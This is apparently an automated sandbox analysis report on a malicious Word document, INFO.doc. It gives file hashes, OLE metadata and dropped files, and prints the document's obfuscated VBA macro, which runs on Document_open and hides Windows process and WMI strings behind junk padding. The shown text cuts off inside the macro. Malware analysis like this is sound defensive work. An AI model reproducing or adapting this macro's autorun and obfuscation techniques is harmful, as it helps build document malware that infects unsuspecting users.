                                                        MD5:210CFB2EADB6910D1AD6B5AAFD215DA9
                                                        SHA1:1B72AC05B5710D410D89B792B7CB509D662E8DDB
                                                        SHA-256:3D221B2F218ECBACE052EA97F651A7C0FB293338034423C0491FA37941EF9E6D
                                                        SHA-512:C15EE29AD6E7168B1724337697E1194C62CEE68C78B9023C30CDD6CC91E474921B65E8B62693755ECD46F00C4F79D8E41298BF20BF48F6F0C499E720DC79F563
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\Desktop\~$INFO.doc
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.431160061181642
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                        MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                        Malicious:true
                                                        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                        C:\Users\user\Snuvw2w\V4651pz\H64C.dll
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):352816
                                                        Entropy (8bit):4.350832676862006
                                                        Encrypted:false
                                                        SSDEEP:3072:C/vA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:C/206xWgGxLxWN40PDKR/JnX2P
                                                        MD5:45BEF3EAD05A5341AE72C1A82810AFF9
                                                        SHA1:6CA0F1AE717792FD032F6F027C1B5082D7EDD1B0
                                                        SHA-256:F19C923463201B992925117DD987F7F254228AB1CAC7D89988CF143F5A0FCFBF
                                                        SHA-512:4DB29CA7BD994FFD3FF9A5E676CD1C3F0CBB9587952DE01E753F156AB22B981367CEFDA418640B2A570F2BCE33E39EC47B0859AF8FB7D95C29612043125D36AC
                                                        Malicious:true
                                                        Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Lithuanian Litas Interactions Intelligent Steel Hat Down-sized port XML Coordinator Response Jewelery & Games Cambridgeshire Steel SSL XSS artificial intelligence, Author: Elizabeth Domnguez, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 12:16:00 2021, Last Saved Time/Date: Fri Jan 22 12:16:00 2021, Number of Pages: 1, Number of Words: 4060, Number of Characters: 23145, Security: 8
                                                        Entropy (8bit):6.706128183314752
                                                        TrID:
                                                        • Microsoft Word document (32009/1) 79.99%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                        File name:INFO.doc
                                                        File size:177664
                                                        MD5:ef80dff28ff3f00ec7abb65ac94de266
                                                        SHA1:bf77b2394d129b8c35bafff800b0cf61d508e8b8
                                                        SHA256:19eabf766e8a1eab6d6736638f9331a3ed1606b329cf336e4a564c8b0ab220f4
                                                        SHA512:c99bac8b71f8871aab3a2fc0228772c9c770d01ecf3f9babc9f5c5c358706919e89a829c1be08f6b09339890d0f35bab7591988dc185e7eed1ef25cef658b31f
                                                        SSDEEP:3072:YwT4OUNzBgQEPcnc2kTdcrrXyQBsc0vWJVi4IrwV3YbdYPeFmfG5/+vGsPt4kohV:YwT4OUNzBgQEPcnc2tPIIt+
                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4eea2aaa4b4b4a4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "INFO.doc"

                                                        Indicators

                                                        Has Summary Info:True
                                                        Application Name:Microsoft Office Word
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:True
                                                        Contains Workbook/Book Stream:False
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:True

                                                        Summary

                                                        Code Page:1252
                                                        Title:
                                                        Subject:Lithuanian Litas Interactions Intelligent Steel Hat Down-sized port XML Coordinator Response Jewelery & Games Cambridgeshire Steel SSL XSS artificial intelligence
                                                        Author:Elizabeth Domnguez
                                                        Keywords:
                                                        Comments:
                                                        Template:Normal.dotm
                                                        Last Saved By:
                                                        Revion Number:1
                                                        Total Edit Time:0
                                                        Create Time:2021-01-22 12:16:00
                                                        Last Saved Time:2021-01-22 12:16:00
                                                        Number of Pages:1
                                                        Number of Words:4060
                                                        Number of Characters:23145
                                                        Creating Application:Microsoft Office Word
                                                        Security:8

                                                        Document Summary

                                                        Document Code Page:-535
                                                        Number of Lines:192
                                                        Number of Paragraphs:54
                                                        Thumbnail Scaling Desired:False
                                                        Company:
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:917504

                                                        Streams with VBA

                                                        VBA File Name: Tvh1u8793dltn9, Stream Size: 1109
                                                        General
                                                        Stream Path:Macros/VBA/Tvh1u8793dltn9
                                                        VBA File Name:Tvh1u8793dltn9
                                                        Stream Size:1109
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . { . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 7b 84 8f 58 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                        VBA Code Keywords

                                                        Keyword
                                                        Document_open()
                                                        VB_Creatable
                                                        False
                                                        Private
                                                        VB_Exposed
                                                        Attribute
                                                        VB_Name
                                                        VB_PredeclaredId
                                                        VB_GlobalNameSpace
                                                        VB_Base
                                                        VB_Customizable
                                                        VB_TemplateDerived
                                                        VBA Code
                                                        Attribute VB_Name = "Tvh1u8793dltn9"
                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = True
                                                        Attribute VB_Customizable = True
                                                        Private Sub Document_open()
                                                        Cfqzsexf2_k
                                                        End Sub
                                                        VBA File Name: Twh1gb2mpd3, Stream Size: 697
                                                        General
                                                        Stream Path:Macros/VBA/Twh1gb2mpd3
                                                        VBA File Name:Twh1gb2mpd3
                                                        Stream Size:697
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . { . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 7b 84 c2 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                        VBA Code Keywords

                                                        Keyword
                                                        Attribute
                                                        VB_Name
                                                        VBA Code
                                                        Attribute VB_Name = "Twh1gb2mpd3"
                                                        VBA File Name: X1bqz0qaer43b52bf, Stream Size: 25057
                                                        General
                                                        Stream Path:Macros/VBA/X1bqz0qaer43b52bf
                                                        VBA File Name:X1bqz0qaer43b52bf
                                                        Stream Size:25057
                                                        Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 7b 84 d9 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                        VBA Code Keywords

                                                        Keyword
                                                        fUGOALvdN,
                                                        KgsfYDHSH
                                                        OlVYDaAK.Range
                                                        iVxnxGH()
                                                        TMQhTRa,
                                                        Until
                                                        lMxOJUo
                                                        htkDBkB,
                                                        hbrLsIIaJ
                                                        lTApi,
                                                        WhmkB
                                                        JRtnBYH
                                                        KAIEzBBDB:
                                                        axfnb
                                                        ZFzwZcA
                                                        OGmjSHH,
                                                        DOUPnxsoh
                                                        TQOflAN:
                                                        bkUZDN
                                                        UmQHurWB
                                                        JltZHC
                                                        pXPTCf(jHDSG)
                                                        QNtsSHe()
                                                        rZGGJBDEH
                                                        EvkuEA
                                                        xhcZSBIH
                                                        imnrzOF
                                                        (LZepVwu
                                                        LfOAoxD,
                                                        lTApi
                                                        wrpigDnBA
                                                        (lqbmGD
                                                        wVEbaDF
                                                        OGmjSHH
                                                        udnviH
                                                        njcnja
                                                        NreFC:
                                                        (ofBYJAJ
                                                        ZlnBbxF.Range
                                                        GXzgs
                                                        bquxP
                                                        rVJUDUKH
                                                        KwsnJ
                                                        (TMQhTRa
                                                        FcotIf()
                                                        QtjyA:
                                                        opZGEJ
                                                        urNCUFJBF:
                                                        iqpwDAG
                                                        sJtmJ
                                                        (yNTJYEFj
                                                        BMzteJlIE(ccUPI)
                                                        BMzteJlIE
                                                        FVoXJ
                                                        UZSgXY,
                                                        NDNfzBJJ
                                                        wEvDIdG
                                                        MidB$(pXPTCf,
                                                        MidB$(zxBvQRHoF,
                                                        TtNYEBE
                                                        zxEzinCG
                                                        YvQjieFc.Range
                                                        XdfYSIXX.Range
                                                        HoDns
                                                        arTLjQ
                                                        (UZSgXY
                                                        wzAgBA
                                                        pXRdBD()
                                                        pzxJi
                                                        pXPTCf()
                                                        pxjzGA
                                                        DLNPo(zZJyEAC)
                                                        MidB$(bKloWCbL,
                                                        IFmVwCk
                                                        NelhA
                                                        QtjyA
                                                        pxjzGA(FKISJTLG)
                                                        aekya
                                                        KGTisCFg
                                                        UBound(pXRdBD)
                                                        yEbqhrSDE
                                                        QNtsSHe
                                                        EHISACDA
                                                        pXRdBD(bDqBloVC)
                                                        cXPNdFE()
                                                        IeEnJ
                                                        FcotIf
                                                        hVgaFGj
                                                        DLNPo
                                                        jpCcJn()
                                                        KAIEzBBDB
                                                        zZJyEAC,
                                                        cwrlb
                                                        ooYfBGDHB
                                                        swiEYEUA
                                                        PRawGB
                                                        mDUMGI
                                                        wjnsc
                                                        pblpJEP,
                                                        fNBrHlEAv:
                                                        boTEsG,
                                                        YXZHHCaB(htkDBkB)
                                                        QyRiIm,
                                                        BMfqCFLcE
                                                        tmhzE
                                                        nnjasd,
                                                        UBound(bIdgDIKT)
                                                        Resume
                                                        (lTApi
                                                        TIdZDCk.Range
                                                        SWSoCG:
                                                        prgAO
                                                        UBound(FcotIf)
                                                        DLwSlnDF
                                                        OfcyMA
                                                        XxLEEC:
                                                        IFdNKp,
                                                        wqMdGGa()
                                                        EFfaBWHC
                                                        ZFzwZcA()
                                                        (bDqBloVC
                                                        bZSWsqlD.Range
                                                        WEIxlI
                                                        UBound(wqMdGGa)
                                                        (OGmjSHH
                                                        MidB$(wWvlxHJH,
                                                        IFdNKp
                                                        cxvFCyK
                                                        MxAtNhGI
                                                        AOSGE
                                                        (nHiSH
                                                        LVHhGsGJd
                                                        ZGOfHDFZ
                                                        wqMdGGa(ZXUkHUDE)
                                                        BhNEmrIE:
                                                        MidB$(YXZHHCaB,
                                                        wFpBJBJE.Range
                                                        fPJtR
                                                        pblpJEP
                                                        ScLedvBEA
                                                        JPHDBd
                                                        VwecCsW
                                                        tVHJH.Range
                                                        wWvlxHJH
                                                        OlVYDaAK
                                                        nHiSH,
                                                        ooYfBGDHB.Range
                                                        (iqpwDAG
                                                        (mDUMGI
                                                        JJlPCJ
                                                        bkUZDN.Range
                                                        NreFC
                                                        jHDSG,
                                                        UBound(bKloWCbL)
                                                        yJRyW
                                                        VwecCsW.Range
                                                        pXPTCf
                                                        nfGGCgIdG
                                                        bKloWCbL()
                                                        mDUMGI,
                                                        qZUuB()
                                                        (EHISACDA
                                                        cXPNdFE
                                                        (htkDBkB
                                                        DwikAuvE,
                                                        MidB$(VuThCQHH,
                                                        iVxnxGH(yNTJYEFj)
                                                        cXPNdFE(IFdNKp)
                                                        EHISACDA,
                                                        FSWADGB
                                                        UBound(jpCcJn)
                                                        jHDSG
                                                        obcJwDFA
                                                        (wJpzu
                                                        tgyiIBI:
                                                        KqVudsGK
                                                        axZmGGE
                                                        seTGCvRG
                                                        MidB$(cXPNdFE,
                                                        VB_Name
                                                        wUyzGJ.Range
                                                        ElQBeG
                                                        oyFNHnHHI
                                                        OaVnI
                                                        BhNEmrIE
                                                        aBRvB
                                                        VcRJFFPFy:
                                                        FJGWlF,
                                                        (KGTisCFg
                                                        vcpiDgaED
                                                        nhgrV:
                                                        ZlnBbxF
                                                        UZSgXY
                                                        OELBME
                                                        OZDOK
                                                        qjZyxC:
                                                        (DwikAuvE
                                                        SWiOAACq
                                                        VFEoD
                                                        dWLbDBA
                                                        (WEIxlI
                                                        fUGOALvdN
                                                        Mid(Application.Name,
                                                        KGTisCFg,
                                                        (boTEsG
                                                        MidB$(QNtsSHe,
                                                        nSFIYBiG
                                                        bKloWCbL(nSFIYBiG)
                                                        YvQjieFc
                                                        UBound(BMzteJlIE)
                                                        ZtgGUHFGJ
                                                        qqdsB
                                                        YqhWFED
                                                        KwsnJ,
                                                        UBound(YXZHHCaB)
                                                        ccUPI,
                                                        CMhXU:
                                                        BMfqCFLcE.Range
                                                        YXZHHCaB
                                                        wWvlxHJH(EHISACDA)
                                                        SWSoCG
                                                        NTrejcdK(boTEsG)
                                                        MidB$(BMzteJlIE,
                                                        XdfYSIXX
                                                        xNIlBBInl
                                                        fWUcJcE,
                                                        ShwUGEG
                                                        OgZqDzXrC
                                                        NTrejcdK
                                                        (fiGUDJCof
                                                        dxYfn,
                                                        UBound(pxjzGA)
                                                        gLahNHF
                                                        BYQeC
                                                        (wEvDIdG
                                                        phkpFqFCH
                                                        rYDvv:
                                                        tVHJH
                                                        qjZyxC
                                                        GOSKJ
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        (dxYfn
                                                        tgyiIBI
                                                        kjSGfNWH
                                                        MSHSTFGF
                                                        zxBvQRHoF()
                                                        ZXUkHUDE,
                                                        xFjGF
                                                        NelhA:
                                                        TVnICGBMg
                                                        ofBYJAJ
                                                        oTxSFKM
                                                        iqpwDAG,
                                                        UYxXOcIJG
                                                        YgziIE
                                                        rYDvv
                                                        bZSWsqlD
                                                        fiGUDJCof,
                                                        VuThCQHH(DwikAuvE)
                                                        (zxEzinCG
                                                        DLwSlnDF.Range
                                                        DAKdJA
                                                        EvkuEA.Range
                                                        bDqBloVC,
                                                        MidB$(jpCcJn,
                                                        wFpBJBJE
                                                        (QyRiIm
                                                        BeNoB
                                                        nHiSH
                                                        IVjOAGZe.Range
                                                        OgZqDzXrC:
                                                        PwelHHe
                                                        zxBvQRHoF(LfOAoxD)
                                                        OXSmB
                                                        iyOuxJbS
                                                        Gownu
                                                        mwvhyA
                                                        FKISJTLG,
                                                        ZFzwZcA(WEIxlI)
                                                        bHGFAGJ
                                                        (SWiOAACq
                                                        OXSmB:
                                                        WEIxlI,
                                                        (jHDSG
                                                        wzeYO,
                                                        MidB$(bIdgDIKT,
                                                        duvyGCCDG:
                                                        bDqBloVC
                                                        PpRoB
                                                        Word.Paragraph
                                                        (fWUcJcE
                                                        nVwvHB
                                                        XxLEEC
                                                        UBound(cXPNdFE)
                                                        fWUcJcE
                                                        dxYfn
                                                        MidB$(DLNPo,
                                                        TQOflAN
                                                        (FKISJTLG
                                                        QDRLrCD
                                                        Content
                                                        YgziIE,
                                                        fEtRs
                                                        lqbmGD
                                                        kxpwbBJF
                                                        UBound(QNtsSHe)
                                                        NTrejcdK()
                                                        (LfOAoxD
                                                        wEvDIdG,
                                                        TIdZDCk
                                                        QbynDCF
                                                        (nSFIYBiG
                                                        iVxnxGH
                                                        nSFIYBiG,
                                                        SlFMhE
                                                        yNTJYEFj,
                                                        LfOAoxD
                                                        MidB$(NTrejcdK,
                                                        ccUPI
                                                        IacBICp
                                                        MidB$(pxjzGA,
                                                        Mpmet
                                                        hVgaFGj()
                                                        cxvFCyK,
                                                        UBound(DLNPo)
                                                        MidB$(iVxnxGH,
                                                        LZepVwu
                                                        zxEzinCG,
                                                        DwikAuvE
                                                        UBound(iVxnxGH)
                                                        YXZHHCaB()
                                                        wJpzu
                                                        JoHgzC
                                                        dMAig
                                                        pxjzGA()
                                                        (cxvFCyK
                                                        fiGUDJCof
                                                        PDdhFK
                                                        UBound(ZFzwZcA)
                                                        QyRiIm
                                                        ofBYJAJ,
                                                        zxBvQRHoF
                                                        wWvlxHJH()
                                                        MidB$(hVgaFGj,
                                                        (IFdNKp
                                                        kjSGfNWH.Range
                                                        DHwdFs
                                                        pzxJi:
                                                        UBound(qZUuB)
                                                        XHCLGl
                                                        Len(skuwd))
                                                        gNcNXLsAj
                                                        wUyzGJ
                                                        JRtnBYH.Range
                                                        htkDBkB
                                                        FJGWlF
                                                        (FJGWlF
                                                        WfWmdXBB
                                                        BLbjEJvG
                                                        UBound(hVgaFGj)
                                                        zIlZF
                                                        fNBrHlEAv
                                                        lqbmGD,
                                                        fPExO
                                                        ZXUkHUDE
                                                        RSOyLFC
                                                        (fUGOALvdN
                                                        UBound(VuThCQHH)
                                                        (ccUPI
                                                        wqMdGGa
                                                        jpCcJn(dxYfn)
                                                        boTEsG
                                                        elJkJIB
                                                        obTyv
                                                        (YgziIE
                                                        OpNHJEa
                                                        BMzteJlIE()
                                                        pXRdBD
                                                        FKISJTLG
                                                        MidB$(qZUuB,
                                                        LZepVwu,
                                                        (ZXUkHUDE
                                                        bKloWCbL
                                                        Mid(skuwd,
                                                        qZUuB(SWiOAACq)
                                                        UBound(pXPTCf)
                                                        jpCcJn
                                                        (pblpJEP
                                                        OaOIEKmCA
                                                        yNTJYEFj
                                                        QNtsSHe(LZepVwu)
                                                        MidB$(pXRdBD,
                                                        ScLedvBEA:
                                                        MidB$(FcotIf,
                                                        UBound(zxBvQRHoF)
                                                        bIdgDIKT(KwsnJ)
                                                        fFCxQGp
                                                        (zZJyEAC
                                                        SWiOAACq,
                                                        Error
                                                        wzeYO
                                                        qZUuB
                                                        (wzAgBA
                                                        wJpzu,
                                                        (wzeYO
                                                        Attribute
                                                        duvyGCCDG
                                                        bIdgDIKT
                                                        bIdgDIKT()
                                                        nhgrV
                                                        RSOyLFC.Range
                                                        yktdUg
                                                        PlllYA.Range
                                                        MidB$(wqMdGGa,
                                                        rVJUDUKH.Range
                                                        DLNPo()
                                                        Function
                                                        UBound(wWvlxHJH)
                                                        zZJyEAC
                                                        MidB$(ZFzwZcA,
                                                        IVjOAGZe
                                                        PlllYA
                                                        VuThCQHH()
                                                        (KwsnJ
                                                        CMhXU
                                                        zkqnNAIz
                                                        VuThCQHH
                                                        tsgajz
                                                        wzAgBA,
                                                        nnjasd
                                                        FcotIf(lqbmGD)
                                                        hVgaFGj(lTApi)
                                                        VcRJFFPFy
                                                        UBound(NTrejcdK)
                                                        urNCUFJBF
                                                        skuwd
                                                        TMQhTRa
                                                        VBA Code
                                                        Attribute VB_Name = "X1bqz0qaer43b52bf"
                                                        Function Cfqzsexf2_k()
                                                           GoTo duvyGCCDG
                                                        Set IacBICp = IFmVwCk
                                                            Dim wzeYO, ZXUkHUDE, dWLbDBA As Long
                                                            Dim bZSWsqlD As Word.Paragraph
                                                            Dim wqMdGGa() As Byte
                                                            For Each bZSWsqlD In Tvh1u8793dltn9.Paragraphs
                                                                wqMdGGa = bZSWsqlD.Range
                                                                dscc = "sadsaccc" & bZSWsqlD.Range
                                                                ZXUkHUDE = UBound(wqMdGGa) - 1
                                                                wzeYO = 0
                                                        Set oTxSFKM = PwelHHe
                                                                Do Until ZXUkHUDE > ZXUkHUDE
                                                                    If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then
                                                                        dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3)
                                                                        wzeYO = ZXUkHUDE + 2
                                                                    End If
                                                                    ZXUkHUDE = ZXUkHUDE + 2
                                                                Loop
                                                            Next
                                                        duvyGCCDG:
                                                        skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9 . Content + P74x_w06z8wy
                                                           GoTo NreFC
                                                        Set zkqnNAIz = DOUPnxsoh
                                                            Dim ofBYJAJ, LfOAoxD, gNcNXLsAj As Long
                                                            Dim BMfqCFLcE As Word.Paragraph
                                                            Dim zxBvQRHoF() As Byte
                                                            For Each BMfqCFLcE In Tvh1u8793dltn9.Paragraphs
                                                                zxBvQRHoF = BMfqCFLcE.Range
                                                                dscc = "sadsaccc" & BMfqCFLcE.Range
                                                                LfOAoxD = UBound(zxBvQRHoF) - 1
                                                                ofBYJAJ = 0
                                                        Set GXzgs = tmhzE
                                                                Do Until LfOAoxD > LfOAoxD
                                                                    If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then
                                                                        dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)
                                                                        ofBYJAJ = LfOAoxD + 2
                                                                    End If
                                                                    LfOAoxD = LfOAoxD + 2
                                                                Loop
                                                            Next
                                                        NreFC:
                                                        wjnsc = "x [ sh bpx [ sh b"
                                                        T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
                                                           GoTo fNBrHlEAv
                                                        Set JJlPCJ = obTyv
                                                            Dim wJpzu, IFdNKp, KgsfYDHSH As Long
                                                            Dim rVJUDUKH As Word.Paragraph
                                                            Dim cXPNdFE() As Byte
                                                            For Each rVJUDUKH In Tvh1u8793dltn9.Paragraphs
                                                                cXPNdFE = rVJUDUKH.Range
                                                                dscc = "sadsaccc" & rVJUDUKH.Range
                                                                IFdNKp = UBound(cXPNdFE) - 1
                                                                wJpzu = 0
                                                        Set XHCLGl = JoHgzC
                                                                Do Until IFdNKp > IFdNKp
                                                                    If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then
                                                                        dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)
                                                                        wJpzu = IFdNKp + 2
                                                                    End If
                                                                    IFdNKp = IFdNKp + 2
                                                                Loop
                                                            Next
                                                        fNBrHlEAv:
                                                        Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
                                                           GoTo KAIEzBBDB
                                                        Set lMxOJUo = BYQeC
                                                            Dim mDUMGI, KwsnJ, cwrlb As Long
                                                            Dim PlllYA As Word.Paragraph
                                                            Dim bIdgDIKT() As Byte
                                                            For Each PlllYA In Tvh1u8793dltn9.Paragraphs
                                                                bIdgDIKT = PlllYA.Range
                                                                dscc = "sadsaccc" & PlllYA.Range
                                                                KwsnJ = UBound(bIdgDIKT) - 1
                                                                mDUMGI = 0
                                                        Set OELBME = PpRoB
                                                                Do Until KwsnJ > KwsnJ
                                                                    If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then
                                                                        dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)
                                                                        mDUMGI = KwsnJ + 2
                                                                    End If
                                                                    KwsnJ = KwsnJ + 2
                                                                Loop
                                                            Next
                                                        KAIEzBBDB:
                                                        D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
                                                           GoTo OXSmB
                                                        Set opZGEJ = OfcyMA
                                                            Dim UZSgXY, SWiOAACq, axfnb As Long
                                                            Dim RSOyLFC As Word.Paragraph
                                                            Dim qZUuB() As Byte
                                                            For Each RSOyLFC In Tvh1u8793dltn9.Paragraphs
                                                                qZUuB = RSOyLFC.Range
                                                                dscc = "sadsaccc" & RSOyLFC.Range
                                                                SWiOAACq = UBound(qZUuB) - 1
                                                                UZSgXY = 0
                                                        Set fFCxQGp = VFEoD
                                                                Do Until SWiOAACq > SWiOAACq
                                                                    If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then
                                                                        dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)
                                                                        UZSgXY = SWiOAACq + 2
                                                                    End If
                                                                    SWiOAACq = SWiOAACq + 2
                                                                Loop
                                                            Next
                                                        OXSmB:
                                                        C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
                                                           GoTo rYDvv
                                                        Set GOSKJ = AOSGE
                                                            Dim pblpJEP, yNTJYEFj, EFfaBWHC As Long
                                                            Dim OlVYDaAK As Word.Paragraph
                                                            Dim iVxnxGH() As Byte
                                                            For Each OlVYDaAK In Tvh1u8793dltn9.Paragraphs
                                                                iVxnxGH = OlVYDaAK.Range
